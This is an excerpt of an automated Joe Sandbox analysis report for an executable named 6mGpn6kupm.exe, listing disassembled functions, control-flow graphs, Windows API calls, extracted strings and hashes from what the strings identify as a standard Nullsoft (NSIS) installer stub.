                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 579 405cb6-405cba 577->579 580 405b42-405b44 578->580 581 405b53-405b63 call 4063e8 578->581 582 405c64-405c69 580->582 583 405b4a-405b4d 580->583 587 405b72-405b73 call 405d09 581->587 588 405b65-405b70 lstrcatW 581->588 582->579 586 405c6b-405c6e 582->586 583->581 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->579 590->579 597 405c82-405c96 call 405cbd call 405ab2 590->597 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 598 405b93-405baf lstrlenW FindFirstFileW 594->598 595->594 595->598 614 405c98-405c9b 597->614 615 405cae-405cb1 call 405450 597->615 600 405bb5-405bbd 598->600 601 405c59-405c5d 598->601 602 405bdd-405bf1 call 4063e8 600->602 603 405bbf-405bc7 600->603 601->582 605 405c5f 601->605 616 405bf3-405bfb 602->616 617 405c08-405c13 call 405ab2 602->617 606 405bc9-405bd1 603->606 607 405c3c-405c4c FindNextFileW 603->607 605->582 606->602 610 405bd3-405bdb 606->610 607->600 613 405c52-405c53 FindClose 607->613 610->602 610->607 613->601 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->579 616->607 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->579 619->607 627->607 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 405c2c-405c32 628->632 631->607 632->607
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-3984366992
                                                                                                              • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,774D2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 270 40408c-404091 call 4043ab 264->270 271 40404e-404051 264->271 265->264 267 403eb5-403ec2 SetWindowPos 266->267 268 403ec8-403ecb 266->268 267->268 272 403ee5-403eeb 268->272 273 403ecd-403edf ShowWindow 268->273 283 404096-4040b1 270->283 275 404053-40405e call 401389 271->275 276 404084-404086 271->276 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->270 282 40432c 276->282 289 403f0c-403f18 SetWindowLongW 278->289 290 403f1d-403f23 278->290 286 404309-40430f 279->286 288 40432e-404335 282->288 284 4040b3-4040b5 call 40140b 283->284 285 4040ba-4040c0 283->285 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 286->282 293 404311-404317 286->293 289->288 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->286 296->288 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->288 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 312 403f79-403f7f 310->312 313 403fad-403fc0 SendMessageW 310->313 311->313 316 403f6e-403f70 311->316 317 403f81-403f87 call 40140b 312->317 318 403f96-403f9f call 40140b 312->318 313->296 316->309 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->286 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->286 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->286
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 3282139019-3251261122
                                                                                                              • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-268981469
                                                                                                              • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 460 403187-40318c 452->460 461 4030bc-4030bf 452->461 454 402fd7 453->454 455 402fd9-402fe6 call 403447 453->455 454->455 462 403143-40314b call 402e8e 455->462 463 402fec-402ff2 455->463 460->445 464 4030c1-4030d9 call 40345d call 403447 461->464 465 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 461->465 462->460 466 403072-403076 463->466 467 402ff4-40300c call 405e99 463->467 464->460 488 4030df-4030e5 464->488 491 403139-40313e 465->491 492 40314d-40317d call 40345d call 4031d6 465->492 472 403078-40307e call 402e8e 466->472 473 40307f-403085 466->473 467->473 486 40300e-403015 467->486 472->473 479 403087-403095 call 4068b5 473->479 480 403098-4030a2 473->480 479->480 480->452 480->453 486->473 490 403017-40301e 486->490 488->460 488->465 490->473 493 403020-403027 490->493 491->445 499 403182-403185 492->499 493->473 495 403029-403030 493->495 495->473 498 403032-403052 495->498 498->460 500 403058-40305c 498->500 499->460 501 40318e-40319f 499->501 502 403064-40306c 500->502 503 40305e-403062 500->503 505 4031a1 501->505 506 4031a7-4031ac 501->506 502->473 504 40306e-403070 502->504 503->452 503->502 504->473 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6mGpn6kupm.exe,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6mGpn6kupm.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\6mGpn6kupm.exe,C:\Users\user\Desktop\6mGpn6kupm.exe,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: 'F$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\6mGpn6kupm.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-3902140428
                                                                                                              • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 516 406457-40645e 514->516 517 406662-40666d 515->517 518 406463-406470 515->518 516->515 520 406678-406679 517->520 521 40666f-406673 call 4063e8 517->521 518->517 519 406476-406482 518->519 522 406643 519->522 523 406488-4064c6 519->523 521->520 527 406651-406654 522->527 528 406645-40664f 522->528 525 4065e6-4065ea 523->525 526 4064cc-4064d7 523->526 531 4065ec-4065f2 525->531 532 40661d-406621 525->532 529 4064f0 526->529 530 4064d9-4064de 526->530 527->515 528->515 538 4064f7-4064fe 529->538 530->529 535 4064e0-4064e3 530->535 536 406602-40660e call 4063e8 531->536 537 4065f4-406600 call 40632f 531->537 533 406630-406641 lstrlenW 532->533 534 406623-40662b call 40640a 532->534 533->515 534->533 535->529 540 4064e5-4064e8 535->540 545 406613-406619 536->545 537->545 542 406500-406502 538->542 543 406503-406505 538->543 540->529 546 4064ea-4064ee 540->546 542->543 548 406540-406543 543->548 549 406507-40652e call 4062b6 543->549 545->533 551 40661b 545->551 546->538 552 406553-406556 548->552 553 406545-406551 GetSystemDirectoryW 548->553 559 406534-40653b call 40640a 549->559 560 4065ce-4065d1 549->560 555 4065de-4065e4 call 40667c 551->555 557 4065c1-4065c3 552->557 558 406558-406566 GetWindowsDirectoryW 552->558 556 4065c5-4065c9 553->556 555->533 556->555 562 4065cb 556->562 557->556 561 406568-406572 557->561 558->557 559->556 560->555 565 4065d3-4065d9 lstrcatW 560->565 567 406574-406577 561->567 568 40658c-4065a2 SHGetSpecialFolderLocation 561->568 562->560 565->555 567->568 570 406579-406580 567->570 571 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 568->571 572 4065bd 568->572 573 406588-40658a 570->573 571->556 571->572 572->557 573->556 573->568
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
